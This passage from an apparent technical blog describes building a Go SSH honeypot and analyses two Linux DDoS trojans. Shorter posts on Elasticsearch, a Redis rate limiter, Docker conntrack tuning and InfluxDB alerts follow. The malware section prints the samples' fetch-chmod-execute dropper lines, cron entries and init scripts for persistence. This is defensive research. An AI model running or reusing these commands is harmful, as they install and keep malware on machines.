37		if err != nil {
38			log.Fatalf("Body read error: %s", err)
39		}
41		defer resp.Body.Close()
42		body, err2 := ioutil.ReadAll(resp.Body)
43		if err2 != nil {
44			log.Fatalf("Body read error: %s", err2)
45		}
46		httpReq.Response = string(body)
47		httpReq.Save()
49		log.Printf("[ http://%s ] %s", url, body)
51		channel.Write(body)
52		// make the http request
54		//if resp, ok := httpHandler[url]; ok {
55		//	channel.Write(resp)
56		//} else {
57		//	channel.Write([]byte(""))
58		//}
59		channel.Close()
60	}
61}

On line 5 we’re going to read directly from the TCP connection, and only up to 1MB of data - if we get an EOF we’ll return. Next on line 1213 we’re using a nice part of the http package that lets us take a raw stream of TCP bytes and convert it to the appropriate HTTP request that its asking for (like GET /foobar) and handling all the other headers/post params.

After getting the TCP request into something we can work with more easily, we parse out any form params on line 19, and then we reconstruct the url to visit on line 24.

Line 26 is using our persistence struct to save everything that has come in so far.

Lines 35-36 and the commented-out lines 54-58 can be interchanged. For my honeypots I’m actually making the raw requests that they’re asking for (only GETs) - the other option is using the httpHandler struct and creating dummy responses for various websites. After we make the raw request we store the response in our persistence struct and save it to the API on lines 46-47.

Finally on line 59 we close the channel to tell the client that data has been returned and is done.

Handling requests

The biggest portion of handling requests is accepting them and sending them off to the channel handler, which deals with incoming commands and TCP connections. We loop to handle connections and perform the handshake for each new request.

 1for {
 2		tcpConn, err := listener.Accept()
 3		if err != nil {
 4			log.Printf("failed to accept incoming connection (%s)", err)
 5			continue
 6		}
 7		// Before use, a handshake must be performed on the incoming net.Conn.
 8		sshConn, chans, reqs, err := ssh.NewServerConn(tcpConn, sshConfig)
 9		if err != nil {
10			log.Printf("failed to handshake (%s)", err)
11			continue
12		}
14		// Check remote address
15		log.Printf("new ssh connection from %s (%s)", sshConn.RemoteAddr(), sshConn.ClientVersion())
17		// Print incoming out-of-band Requests
18		go handleRequests(reqs)
19		// Accept all channels
20		go handleChannels(chans, sshConn.Permissions)
21	}

On line 18 we just log out-of-band requests that aren’t what we want. Line 20 handles the meat and potatoes of our program: incoming commands and SOCKS proxy requests. We do both of these in goroutines so multiple clients can connect at once.

The next important step is handling both out of band requests and incoming TCP connections - jump to the end of the code block for an explanation.

  1func handleChannels(chans <-chan ssh.NewChannel, perms *ssh.Permissions) {
  2	// Service the incoming Channel channel.
  3	for newChannel := range chans {
  4		channel, requests, err := newChannel.Accept()
  5		if err != nil {
  6			log.Printf("could not accept channel (%s)", err)
  7			continue
  8		}
 10		var shell string
 11		shell = os.Getenv("SHELL")
 12		if shell == "" {
 13			shell = DEFAULT_SHELL
 14		}
 16		if newChannel.ChannelType() == "direct-tcpip" {
 17			term := terminal.NewTerminal(channel, "")
 18			go HandleTcpReading(channel, term, perms)
 19		}
 21		// Sessions have out-of-band requests such as "shell", "pty-req" and "env"
 22		go func(in <-chan *ssh.Request) {
 23			for req := range in {
 24				term := terminal.NewTerminal(channel, "")
 25				handler := NewCommandHandler(term)
 26				handler.Register(&Ls{}, &LsAl{},
 27					&Help{},
 28					&Pwd{},
 29					&UnsetHistory{},
 30					&Uname{},
 31					&Echo{},
 32					&Whoami{User: "root"},
 33				)
 35				log.Printf("Payload: %s", req.Payload)
 36				ok := false
 37				switch req.Type {
 38				// exec is used: ssh [email protected] 'some command'
 39				case "exec":
 40					ok = true
 41					command := string(req.Payload[4 : req.Payload[3]+4])
 43					cmdOut, newLine := handler.MatchAndRun(command)
 44					term.Write([]byte(cmdOut))
 45					if newLine {
 46						term.Write([]byte("\r\n"))
 47					}
 49					shellCommand := &ShellCommand{Cmd: command, Guid: perms.Extensions["guid"]}
 50					go shellCommand.Save()
 52					channel.Close()
 53				// shell is used: ssh [email protected] ... then commands are entered
 54				case "shell":
 55					for {
 56						term.Write([]byte("[email protected]:/# "))
 57						line, err := term.ReadLine()
 58						if err == io.EOF {
 59							log.Printf("EOF detected, closing")
 60							channel.Close()
 61							ok = true
 62							break
 63						}
 64						if err != nil {
 65							log.Printf("Error: %s", err)
 66						}
 68						cmdOut, newLine := handler.MatchAndRun(line)
 69						term.Write([]byte(cmdOut))
 70						if newLine {
 71							term.Write([]byte("\r\n"))
 72						}
 74						shellCommand := &ShellCommand{Cmd: line, Guid: perms.Extensions["guid"]}
 75						go shellCommand.Save()
 77						log.Println(line)
 78					}
 79					if len(req.Payload) == 0 {
 80						ok = true
 81					}
 82				case "pty-req":
 83					// Responding 'ok' here will let the client
 84					// know we have a pty ready for input
 85					ok = true
 86					// Parse body...
 87					termLen := req.Payload[3]
 88					termEnv := string(req.Payload[4 : termLen+4])
 89					log.Printf("pty-req '%s'", termEnv)
 90				default:
 91					log.Printf("[%s] Payload: %s", req.Type, req.Payload)
 92				}
 94				if !ok {
 95					log.Printf("declining %s request...", req.Type)
 96				}
 98				req.Reply(ok, nil)
 99			}
100		}(requests)
101	}
102}

On line 16 we’re sending the TCP reading off to another function to get handled - the rest of the requests coming in out-of-band will be handled in the function on line 22.

On line 24 we use the terminal package to create a new terminal for reading input and sending output back to the user. Line 25 is our command handler which will do the regex and pattern matching.

Our switch statement is doing the heavy lifting here, starting on line 39.

Now we need to understand the different types of SSH connections and requests that can be made:

  • (line 16) direct-tcpip is what happens when you use your SSH connection to proxy TCP connections (like a SOCKS proxy).

  • (line 39) exec is what happens when you run commands like ssh some [email protected] ‘ls -al’

  • (line 54) shell is what happens when you actually login and start executing commands, a PTY gets launched and you have an interactive command prompt.

  • (line 82) pty-req lets the SSH client know that the server is ready to accept input (works in conjunction with shell).

These are all the command types we care about for now.
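The odd-looking slice in the exec case above (req.Payload[4 : req.Payload[3]+4]) works because SSH encodes the command as a big-endian uint32 length followed by the command bytes. A slightly safer version of that parse, sketched outside the honeypot source, looks like this:

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// parseExecPayload pulls the command out of an SSH "exec" request payload:
// a 4-byte big-endian length, then that many bytes of command.
func parseExecPayload(payload []byte) (string, error) {
	if len(payload) < 4 {
		return "", fmt.Errorf("payload too short: %d bytes", len(payload))
	}
	n := binary.BigEndian.Uint32(payload)
	if uint32(len(payload)-4) < n {
		return "", fmt.Errorf("declared length %d exceeds payload", n)
	}
	return string(payload[4 : 4+n]), nil
}

func main() {
	// simulate the wire format for: ls -al (6 bytes)
	payload := append([]byte{0, 0, 0, 6}, []byte("ls -al")...)
	cmd, err := parseExecPayload(payload)
	fmt.Println(cmd, err) // prints: ls -al <nil>
}
```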

Simulating Commands

A few things we need to keep in mind for this part of the honeypot:

  • Need to simulate commands that are run by attackers
  • Go’s interface pattern fits well here
  • Need to understand command return values
    • Does the command return a new line?
    • If output doesn’t match (including new lines) it may throw off bots/scripts that check for exact output matching
  • Need to be able to match commands based on regex or equality
    • Needs to handle commands like:
      • echo -n test
      • echo test
      • echo foo bar baz
    • Don’t want to write a handler for each variation of a command with flags - would never cover all cases

So with all that in mind lets lay out a framework for the command handler. We need something to register all of our commands, and then a structure for our commands to be run consistently.

 1type CommandHandler struct {
 2	Terminal *terminal.Terminal
 3	Commands []Command
 4}
 6func NewCommandHandler(term *terminal.Terminal) *CommandHandler {
 7	return &CommandHandler{Terminal: term, Commands: []Command{}}
 8}
10func (ch *CommandHandler) Register(commands ...Command) {
11	for _, c := range commands {
12		ch.Commands = append(ch.Commands, c)
13	}
14}
16func (ch *CommandHandler) MatchAndRun(in string) (string, bool) {
17	for _, c := range ch.Commands {
18		if c.Match(strings.TrimSpace(in)) {
19			return c.Run(in)
20		}
21	}
22	return fmt.Sprintf("bash: %s: command not found", in), false
23}
25type Command interface {
26	Match(string) bool
27	Run(string) (string, bool)
28}
30type Echo struct{}
32func (c *Echo) Match(in string) bool {
33	return strings.Contains(in, "echo")
34}
36func (c *Echo) Run(in string) (string, bool) {
37	x := strings.Split(in, " ")
38	newLine := true
39	if len(x) >= 2 {
40		if x[1] == "-n" {
41			newLine = false
42		}
43	}
44	if len(x) == 1 {
45		return "", true
46	}
47	startPos := 1
48	if strings.Contains(x[1], "-") {
49		if len(x) >= 2 {
50			startPos = 2
51		}
52	}
54	return strings.Join(x[startPos:len(x)], " "), newLine
55}

On lines 1 and 6 we’re creating our CommandHandler which will be where all commands get registered to and where we store our terminal to write to.

Line 10 lets us register 1...n commands at once using Go’s variadic argument syntax.

Line 16 is our runner that takes the input from the attacker and runs it through our registered commands. We return the command output and also whether or not it should output a newline at the end. If no registered command matches, we return the generic bash command not found.

Line 25 is our interface definition. We have two functions, Match and Run. Run follows the MatchAndRun pattern where we return the command output and whether or not a newline is needed. The meat of the command can do whatever you want it to do - in this case we’re checking for some specific flags that I’ve seen used on the honeypot and parsing them out.

The Match portion in this case is just a simple Contains check - you can do whatever you want in this portion - it just needs to return a boolean. Go nuts with regexes or just do a simple equality check.
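As an example of the regex route, here's a made-up, regex-flavored Uname command - it is not the one registered in the honeypot source, and the kernel string it returns is invented:

```go
package main

import (
	"fmt"
	"regexp"
)

// Uname fakes the uname command; the regex matches bare `uname`
// plus any combination of simple flags like -a or -r.
type Uname struct{}

var unameRe = regexp.MustCompile(`^uname(\s+-\w+)*$`)

func (c *Uname) Match(in string) bool {
	return unameRe.MatchString(in)
}

func (c *Uname) Run(in string) (string, bool) {
	// always report a generic, slightly dated kernel
	return "Linux localhost 3.13.0-32-generic #57-Ubuntu x86_64 GNU/Linux", true
}

func main() {
	u := &Uname{}
	fmt.Println(u.Match("uname -a"), u.Match("unameblah")) // prints: true false
}
```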

Persistence Layer

For our persistence layer there isn’t anything special going on. We have a few configurable options via ENV vars, the ability to skip sending commands to the remote, and the ability to provide a SERVER_URL to develop against the local rails application.

Now that we have a working honeypot that is able to accept logins, simulate and record commands, we can start analyzing dropped files.

Analyzing Dropped Files

Tools we’ll be using from OS X (please note this is not exhaustive):

  • Virtualbox
  • Docker (docker-machine on OS X)
  • Wireshark
  • VirusTotal

We’re going to use wireshark to process PCAP files generated by Wireshark, so we’ll need to tell VirtualBox to create the network capture:

1/Applications/VirtualBox.app/Contents/MacOS/VBoxManage modifyvm default --nictrace1 on --nictracefile1 /tmp/log.pcap

You may need to stop the docker container for this command to generate pcap files

We can exec into the container to check running processes and see other commands being run.

We’ll be using docker to dump a clean image and an infected image, in order to see what files were modified and/or dropped onto the file system:

1docker export container_id > container.tar
2tar xvf container.tar -C container-dump

What you want to do in order to get as clean a dump as possible:

  • Run a plain ubuntu container with docker run -it ubuntu bash to get a console inside it
  • Run any commands you want (like apt-get update or apt-get install wget or whatever other tools you think you will need)
  • Save the “comparison” container using docker export then extract it into a folder

Now when running the malware (assuming it’s in the current directory):

1docker run -it --volume=`pwd`:/malware:ro ubuntu bash

Repeat the same commands you ran above in the “comparison” container (or save it as an image and spawn from that).

Now you can exec into your container and run the malware. Depending on how comfortable you are with monitoring your own network, you should be doing this on an isolated network. Now on to the two malware samples we’ll be going over today:


Common name: HEUR:Trojan-DDoS.Linux.Xarcen.a
sha256: acbccef76341af012bdf8f0022b302c08c72c6911631f98de8d9f694b3460e25
md5: 63f286aa32a4baaa8b0dd137eb4b3361

Initial look:

  • C&C trojan
  • Drops multiple copies of itself
  • Will randomly spawn processes and change process names

Process output

 1[email protected]:/malware# ps ax
 3    1 ?        Ss     0:00 bash
 4   21 ?        Ssl    0:00 netstat -antop
 5   72 ?        Ss     0:00 bash
 6   75 ?        Ss     0:00 pwd
 7   78 ?        Ss     0:00 route -n
 8   80 ?        Ss     0:00 grep "A"
 9   81 ?        Ss     0:00 whoami
10   93 ?        Ss     0:00 cat resolv.conf
11   96 ?        Ss     0:00 whoami
12   99 ?        R+     0:00 ps ax
13  100 ?        Ss     0:00 su
14  102 ?        R      0:00 /usr/bin/nnqucjsvsp who 21
15[email protected]:/malware# ps ax
17    1 ?        Ss     0:00 bash
18   21 ?        Ssl    0:00 netstat -antop
19   93 ?        Ss     0:00 cat resolv.conf
20   96 ?        Ss     0:00 whoami
21  100 ?        Ss     0:00 su
22  102 ?        Ss     0:00 who
23  103 ?        Ss     0:00 id
24  104 ?        R+     0:00 ps ax
25[email protected]:/malware# ps ax
27    1 ?        Ss     0:00 bash
28   21 ?        Ssl    0:00 netstat -antop
29   93 ?        Ss     0:00 cat resolv.conf
30   96 ?        Ss     0:00 whoami
31  100 ?        Ss     0:00 su
32  102 ?        Ss     0:00 who
33  103 ?        Ss     0:00 id

Network Traffic

 1Frame 523: 271 bytes on wire (2168 bits), 271 bytes captured (2168 bits)
 2Ethernet II, Src: CadmusCo_26:3d:b9 (08:00:27:26:3d:b9), Dst: RealtekU_12:35:02 (52:54:00:12:35:02)
 3Internet Protocol Version 4, Src:, Dst:
 4Transmission Control Protocol, Src Port: 39433 (39433), Dst Port: 80 (80), Seq: 1, Ack: 1, Len: 217
 5Hypertext Transfer Protocol
 6    GET /config.rar HTTP/1.1\r\n
 7        [Expert Info (Chat/Sequence): GET /config.rar HTTP/1.1\r\n]
 8        Request Method: GET
 9        Request URI: /config.rar
10        Request Version: HTTP/1.1
11    Accept: */*\r\n
12    Accept-Language: zh-cn\r\n
13    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)\r\n
14    Host: aa.hostasa.org\r\n
15    Connection: Keep-Alive\r\n
16    \r\n
17    [Full request URI: http://aa.hostasa.org/config.rar]
18    [HTTP request 1/1]
19    [Response in frame: 537]

Dropped Files

Two binaries were dropped onto the filesystem, which looked to be copies of the malware itself:

  • g7hs-dump/usr/bin/filupxsndj
    • sha256: 3657bd42fef97343c78a199d3611285e6fe7b88cc91e127d17ebbbbb2fd2f292
    • Common name: HEUR:Trojan-DDoS.Linux.Xarcen.a
  • g7hs-dump/lib/libudev.so
    • sha256: acbccef76341af012bdf8f0022b302c08c72c6911631f98de8d9f694b3460e25
    • Common name: HEUR:Trojan-DDoS.Linux.Xarcen.a

Several other plain text files were dropped in order to ensure startup:


3for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
4cp /lib/libudev.so /lib/libudev.so.6


1*/3 * * * * root /etc/cron.hourly/gcc.sh


 2# chkconfig: 12345 90 90
 3# description: filupxsndj
 5# Provides:            filupxsndj
 6# Required-Start:
 7# Required-Stop:
 8# Default-Start:      1 2 3 4 5
 9# Default-Stop:
10# Short-Description:  filupxsndj
13case $1 in
15      /usr/bin/filupxsndj
16      ;;
18      ;;
20      /usr/bin/filupxsndj
21      ;;

So we can see several things going on: dropped files, additional payload downloads, attempts to persist itself in as many places as possible, and masking its presence with different process names. These two pieces of malware were the first ones I’ve analyzed (ever) so I don’t have much in-depth analysis other than what I was able to gather from network traffic and observations through docker. For a more detailed analysis, Kaspersky has a great writeup, including reversed source code.

DDOS.Flood / DnsAmp

Common name: DDOS.Flood / DnsAmp
sha256: d9d58fb1f562e7c22bb67edf9dc651fa8bc823ff3e8aecc04131c34b5bc8cf03
md5: b589c8a722b5c35d4bd95487b47f8b8b

Initial look:

  • Initial payload is a shell script
  • Another DDOS type malware
  • Drops several binaries that cover as many architectures as possible (ARM/MIPS/etc)
  • Masks itself as system interrupt process (irq)
  • Uses IRC + HTTP for communication
  • Connects to 2 IPs:
    • Running on AWS, most likely compromised.
    • Running somewhere in Australia.

Dropped Files

Initial Payload

 2wget -c -P /var/run && chmod +x /var/run/tty0 && /var/run/tty0 &
 3wget -c -P /var/run && chmod +x /var/run/tty1 && /var/run/tty1 &
 4wget -c -P /var/run && chmod +x /var/run/tty2 && /var/run/tty2 &
 5wget -c -P /var/run && chmod +x /var/run/tty3 && /var/run/tty3 &
 6wget -c -P /var/run && chmod +x /var/run/tty4 && /var/run/tty4 &
 7wget -c -P /var/run && chmod +x /var/run/tty5 && /var/run/tty5 &
 8wget -c && chmod +x pty && ./pty &
 9wget -c -P /var/run && chmod +x /var/run/pty && /var/run/pty &
10rm -rf /var/run/1sh


1# DO NOT EDIT THIS FILE - edit the master and reinstall.
2# (/var/run/.x001804289383 installed on Tue May 17 21:20:29 2016)
3# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
4* * * * * /run/pty > /dev/null 2>&1 &

Network Traffic

Port 8080

 1Frame 4660: 556 bytes on wire (4448 bits), 556 bytes captured (4448 bits)
 2Ethernet II, Src: RealtekU_12:35:02 (52:54:00:12:35:02), Dst: CadmusCo_26:3d:b9 (08:00:27:26:3d:b9)
 3Internet Protocol Version 4, Src:, Dst:
 4Transmission Control Protocol, Src Port: 8080 (8080), Dst Port: 46783 (46783), Seq: 17, Ack: 85, Len: 502
 5Hypertext Transfer Protocol
 6    :[email protected] PRIVMSG x86|x|0|344265|a31f446d :\001VERSION\001\r\n
 7    :izu.ko 001 x86|x|0|344265|a31f446d :\n
 8    :izu.ko 002 x86|x|0|344265|a31f446d :\n
 9    :izu.ko 003 x86|x|0|344265|a31f446d :\n
10    :izu.ko 004 x86|x|0|344265|a31f446d :\n
11    :izu.ko 005 x86|x|0|344265|a31f446d :\n
12    :izu.ko 005 x86|x|0|344265|a31f446d :\n
13    :izu.ko 005 x86|x|0|344265|a31f446d :\n
14    :izu.ko 375 x86|x|0|344265|a31f446d :\n
15    :izu.ko 372 x86|x|0|344265|a31f446d :- 27/10/2014 11:36\r\n
16    :izu.ko 372 x86|x|0|344265|a31f446d :- !!\r\n
17    :izu.ko 376 x86|x|0|344265|a31f446d :\n
19Frame 4665: 257 bytes on wire (2056 bits), 257 bytes captured (2056 bits)
20Ethernet II, Src: RealtekU_12:35:02 (52:54:00:12:35:02), Dst: CadmusCo_26:3d:b9 (08:00:27:26:3d:b9)
21Internet Protocol Version 4, Src:, Dst:
22Transmission Control Protocol, Src Port: 8080 (8080), Dst Port: 46783 (46783), Seq: 519, Ack: 393, Len: 203
23Hypertext Transfer Protocol
24    :x86|x|0|344265|[email protected] JOIN :#x86\r\n
25    :izu.ko 332 x86|x|0|344265|a31f446d #x86 :https://www.youtube.com/watch?v=dDp3lfE_In8\r\n
26    :izu.ko 333 x86|x|0|344265|a31f446d #x86 Jorgee 1463456542\r\n


I can see several things happening here; the most interesting, I think, is the multiple-architecture support - perhaps trying to compromise routers and other smaller IoT devices that are running ARM or other mobile processors. It tries to mask itself as a pty process and then installs itself in crontab. Finally it does some communication over IRC in plain text. Based on the limited network communication I saw, I’m guessing this might belong to a Spanish hacker group (from the YouTube link) - or it might just be a coincidence of what I saw while executing the malware.

Building the Honeypot Network

Finding cheap hosts is important: we don’t care about a lot of the niceties we’d normally want in a VPS or cloud provider (like DO or AWS) - what we want is a cheap, isolated environment to run our honeypots in (cheaper KVM/Xen, or even cheaper OpenVZ). To that end, serverbear.com is great for simple price comparison shopping.

I’m currently still trying to find the best locations and providers, but have a mix of OpenVZ and KVM instances running. The main OS is Ubuntu; however, any flavor of Linux will do since the Go binary will run on any of them.

And finally, in order to get the best representation of activity, it’s best to spread the servers out globally so you can get a wide geographic coverage (Europe, America, Asia, etc).

Future plans

  • Payload downloading
    • Download the payloads as they get ‘executed’ on the honeypot
  • Automate analysis
    • Automate using docker and other tools to produce reliable analysis output
  • More honeypots
    • Right now I’m only running 6 - each is about $2-5/month
  • Automate WHOIS lookups
    • Automate sending abuse complaints and track which providers actually monitor and care about what their network is used for
  • More services
    • Expand honeypot protocols to FTP, HTTP Proxies (Polipo, Squid, etc), etc

Performance before and after Optimizations

When working with billions of documents in your Elasticsearch cluster, there are a few important things to keep in mind:

  • Look at what the big players do (Elasticsearch/Kibana) for organization and planning
  • Experiment with index sizes that make sense for your business, don’t just assume 1 index for a billion documents is a good idea (even if you use N shards)
  • Understand which metrics to monitor when you are performance testing your cluster
  • Monitor all points of ingestion: Elasticsearch, Load balancers (ELB, HAProxy, etc), and your application code that is inserting

What do the big players do?

Split by date ranges. Based on your data, decide whether daily, weekly, or even monthly splits are best for your dataset. Elasticsearch recommends not going over 30-32G per shard based on current JVM memory recommendations. The reason to stay below 32G is that above it the JVM uses uncompressed pointers, which means internal pointers go from 4 bytes to 8 bytes - depending on your memory size, this can lead to less usable heap and increased GC times.

Don’t allocate more than 50% of your system memory for the JVM. Your kernel will cache files and help keep performance up. Over-allocating the JVM can lead to poor performance from the underlying engine, Lucene, which relies on the OS cache as well as the JVM to do searches.

Understand your users: other devs, other systems, etc. Don’t do deep pagination; instead, use scan and scroll. Turn on slow logging to find any queries doing this or returning too many data points per query.

Index Sizing and Memory

Keeping in mind the 30-32G per shard recommendation, this will determine the number of shards per dataset. Remember the shard count is fixed at index creation, but replicas can be changed at any time. More shards increase indexing performance, while more replicas increase search performance.

Overwhelmed and can’t figure out what to do? Just start with one index and see how things go. Using aliases, you can create another index later on and map both of them together for searching (and eventually delete the old one if the data expires). If you start out with aliases, transitions can be seamless (no need to redeploy to point to the new alias/index name).

Metrics to monitor

Use the plugin community to monitor your cluster: ElasticHQ, BigDesk, Head and Paramedic.

Watch for refresh/merge/flush time (ElasticHQ makes this available under Node Diagnostics). For example, with a large index (1TB) that has frequent updates or deletions, a merge must be performed before the data is actually freed from disk and the cluster. When the number of segments in a cluster gets too large, this can cause issues for refreshing and merging.

The basic idea is the larger your index, the more segments, and the more optimization steps that need to be performed. Automatic flushes happen every few seconds so more segments get created - as you can imagine this gets compounded the larger your index is. You can see a full rundown of how deleting and updating works in the documentation.

By separating our indexes into smaller datasets (by day, week, or month) we can eliminate some of the issues that pop up. For example, a large number of segments can cause search performance issues until an optimize command is run (which in itself can cause high IO and make your search unavailable). By reducing the data we reduce the time these operations can take. We also end up at a point where no new data is inserted into the old indexes, so no further optimizations need to be done on them, only on new indexes. Any activity on the old indexes then should only be from searching and will reduce the IO requirements from the cluster for those shards/indexes.

This also greatly simplifies purging old data. Instead of having to have the cluster do merges and optimizations when we remove old documents, we can just delete the old indexes and remove them from the aliases. This will also reduce the IO overhead on your cluster.

Monitoring Ingestion

Watch your ELB response time - is it spiking? Check flush, merge, and indexing times.

Add logging to your posts to understand how long each bulk insert is taking. Play with bulk sizes to see what works best for your document/datasize.

When moving from a single large index to aliased indexes, insertion times went from 500ms-1.5s+ to 50ms on average. Our daily processes that were taking half a day to complete now finish in less than 15 minutes.

Processing 5k log lines per minute? Now we’re processing over 6 million.

Taking the time to understand your database and how each part of it works can be worth the effort especially if you’re looking for performance gains.

If you’ve done any concurrency work in Go you’ve used WaitGroups. They’re awesome!

Now let’s say you have a bunch of workers that do some stuff, but at some point they all need to hit a single API that you’re rate limited against.

You could move to just using a single process and limiting it that way, but that doesn’t scale out very well.

While there are quite a few distributed lock libraries in Go, I didn’t find any that worked similarly to WaitGroups, so I set out to write one.

( If you just want the library, head on over to Github https://github.com/joshrendek/redis-rate-limiter )

Design goals:

  • Prevent deadlocks
  • Hard limit on concurrency (don’t accidentally creep over)
  • Keep it simple to use
  • Use redis
  • Keep the design similar to sync.WaitGroup by using Add() and Done()

Initially I started off using INCR/DECR with WATCH. This somewhat worked but was causing the bucket to overflow and go above the limit I defined.

Eventually I found the SETNX command and decided that a global lock built around it for the add path was the way to go.

So the final design goes through this flow for Add():

  1. Use SETNX to check if a key exists; loop until it succeeds (aka the lock is available for acquiring)
  2. Immediately add an expiration to the lock key once acquired so we don’t deadlock
  3. Check the current number of workers running; wait until it is below the max rate
  4. Generate a uuid for the worker lock, use this to SET a key and also add to a worker set
  5. Set an expiration on the worker lock key based on uuid so the worker doesn’t deadlock
  6. Unlock the global lock from SETNX by deleting the key
  7. Clean old, potentially locked workers

Removing is much simpler with Done():

  1. Delete the worker lock key
  2. Remove the worker lock from the worker set

For (1) we want to make sure we don’t hammer Redis or the CPU - so we make sure we can pass an option for a sleep duration while busy-waiting.

(2) Prevents the global lock from stalling out if a worker is cancelled in the middle of a lock acquisition.

Waiting for workers in (3) is done by making sure the cardinality ( SCARD ) of the worker set is less than the worker limit. We loop and wait until this count goes down so we don’t exceed our limit.

(4) and (5) use a UUID library to generate a unique id for the worker lock name/value. This gets added via SADD to the wait group worker set and is also set as a standalone key. The key gets a TTL based on the UUID so we can remove it from the set via another method if it no longer exists.

(6) frees the global lock allowing other processes to acquire it while they wait in (1).

To clear old locks in (7) we need to take the members in the worker set and then query with EXISTS to see if the key still exists. If it doesn’t exist but it is still in the set, we know something bad happened. At this point we need to remove it from the worker set so that the slot frees up. This will prevent worker deadlocks from happening if it fails to reach the Done() function.

The Add() function returns a UUID string that you then pass to Done(uuid) to remove the worker locks. I think this was the simplest approach for doing this however if you have other ideas let me know!
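Putting the steps together, here's a compressed sketch of the Add()/Done() flow. The in-memory store stands in for Redis (its methods mirror SETNX/DEL/SADD/SREM/SCARD), and the TTL steps (2) and (5) are elided since there's no real server to expire keys - see the library on GitHub for the full version:

```go
package main

import (
	"fmt"
	"sync"
	"time"
)

// store is the minimal command set the flow needs; an in-memory
// stand-in for Redis (SETNX, DEL, SADD, SREM, SCARD).
type store struct {
	mu   sync.Mutex
	keys map[string]bool
	set  map[string]bool
}

func (s *store) SetNX(k string) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	if s.keys[k] {
		return false
	}
	s.keys[k] = true
	return true
}

func (s *store) Del(k string)  { s.mu.Lock(); delete(s.keys, k); s.mu.Unlock() }
func (s *store) SAdd(m string) { s.mu.Lock(); s.set[m] = true; s.mu.Unlock() }
func (s *store) SRem(m string) { s.mu.Lock(); delete(s.set, m); s.mu.Unlock() }
func (s *store) SCard() int    { s.mu.Lock(); defer s.mu.Unlock(); return len(s.set) }

// Add follows the flow above: take the global lock, wait for a free
// slot, register a worker id, release the global lock.
func Add(s *store, id string, limit int) string {
	for !s.SetNX("global-lock") { // (1) busy-wait for the global lock
		time.Sleep(time.Millisecond)
	}
	for s.SCard() >= limit { // (3) wait until we're below the limit
		time.Sleep(time.Millisecond)
	}
	s.SAdd(id)           // (4) register this worker
	s.Del("global-lock") // (6) release the global lock
	return id
}

// Done deletes the worker's entry, freeing its slot.
func Done(s *store, id string) { s.SRem(id) }

func main() {
	s := &store{keys: map[string]bool{}, set: map[string]bool{}}
	a := Add(s, "worker-a", 2)
	b := Add(s, "worker-b", 2)
	fmt.Println(s.SCard()) // prints: 2
	Done(s, a)
	Done(s, b)
	fmt.Println(s.SCard()) // prints: 0
}
```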

That’s it! We now have a distributed wait group written in go as a library. You can see the source and how to use it over at https://github.com/joshrendek/redis-rate-limiter.

You’ve raised your file descriptor limits, updated security limits, tweaked your network settings and done everything else in preparation to launch your shiny new dockerized application.

Then you have performance issues and you can’t understand why, it looks to be network related. Alright! Let’s see what’s going on:

ping google.com
unknown host google.com

Maybe it’s DNS related…. Let’s try again:

ping google.com
ping: sendmsg: Operation not permitted

That’s odd, maybe it’s a networking issue outside of our servers. Let’s try pinging another host on the subnet:

ping: sendmsg: Operation not permitted

That’s even more odd, our other host isn’t having network issues at all. Let’s try going the other way:

ping # the bad host
# Lots of packet loss

We’re getting a lot of packet loss going from Host B to Host A (the problem machine). Maybe it’s a bad NIC?

Just for fun I decided to try and ping localhost:

ping localhost
ping: sendmsg: Operation not permitted

That’s a new one. What the heck is going on? Now at this point I derped out and didn’t think to check dmesg. Let’s assume you went down the road I went and derped.

What’s the difference between host A and B? Well, host B doesn’t have docker installed!

apt-get remove docker-engine; reboot
# .... wait for reboot
ping localhost
# working
ping # the other host
# working
ping google.com
# working

apt-get install docker-engine
ping localhost
ping: sendmsg: Operation not permitted
ping google.com
ping: sendmsg: Operation not permitted

Okay so it happens when docker is installed. We’ve isolated it. Kernel bug maybe? Queue swapping around kernels and still the same issue happens.

Fun side note: Ubuntu 14.04 has a kernel bug that prevents GRUB from booting into LVM or software RAID setups. Launchpad Bug

Switching back to the normal kernel (3.13) that comes with 14.04, we proceed. Docker bug? Hit up #docker on Freenode. Someone mentions checking dmesg and conntrack information.

Lo-and-behold, dmesg has tons of these:

ip_conntrack: table full, dropping packet
# x1000

How does docker networking work? NAT! That means iptables needs to keep track of all your connections, hence the “table full” message.

If you google the original message you’ll see a lot of people telling you to check your iptables rules and ACCEPT/INPUT chains to make sure there isn’t anything funky in there. If we combine this knowledge + the dmesg errors, we now know what to fix.

Let’s update sysctl.conf and reboot for good measure ( you could also apply the settings with sysctl -p but I wanted to make sure everything was fresh. )

net.ipv4.netfilter.ip_conntrack_tcp_timeout_established = 54000
net.netfilter.nf_conntrack_generic_timeout = 120
net.netfilter.nf_conntrack_max = 556000

Adjust the conntrack max until you hit a stable count (556k worked well for me) and don’t get any more connection errors. Start your shiny new docker application that makes tons of network connections and everything should be good now.

Hope this helps someone in the future, as Google really didn’t have a lot of useful information on this message + Docker.

Influx Alert

Oct 12, 2015 - 2 minutes

I’ve been very happy using InfluxDB with Grafana + StatsD but always wanted a nice way to alert on some of the data being fed into statsd/grafana so I wrote a little tool in Go to accomplish that:

Github: https://github.com/joshrendek/influx-alert

I hope someone finds this useful! It’s got a few simple functions/comparisons done already and support for HipChat and Slack notifications.


Influx Alert

This is a tool to alert on data that is fed into InfluxDB (for example, via statsd) so you can get alerted on it.

How to get it

Go to releases, or download the latest here: v0.1

How to Use

  • name: the name of the alert ( will be used in notifier )
  • interval: how often to check influxdb (in seconds)
  • timeshift: how far back to go (the query is like: where time > now() - TIMESHIFT)
  • limit: the max number of results to return
  • type: influxdb (the only option for now)
  • function: min/max/average are the only supported functions for now
  • query: the influxdb query to run (omit any limit or where clause on the time)
  • trigger: the type of trigger and value that would trigger it
    • operator: gt/lt
    • value: value to compare against (note all values are floats internally)
  • notifiers: an array of notifiers, possible options are slack and hipchat

Example: ( see example.yml for more )

 1- name: Not Enough Foo
 2  type: influxdb
 3  function: average
 4  timeshift: 1h
 5  limit: 10
 6  interval: 10
 7  query: select * from "foo.counter"
 8  notifiers:
 9      - slack
10      - hipchat
11      - foobar
12  trigger:
13    operator: lt
14    value: 10

Environment Variables

  • INFLUX_PORT (8086 is default)
  • HIPCHAT_SERVER (optional)
  • DEBUG (optional)

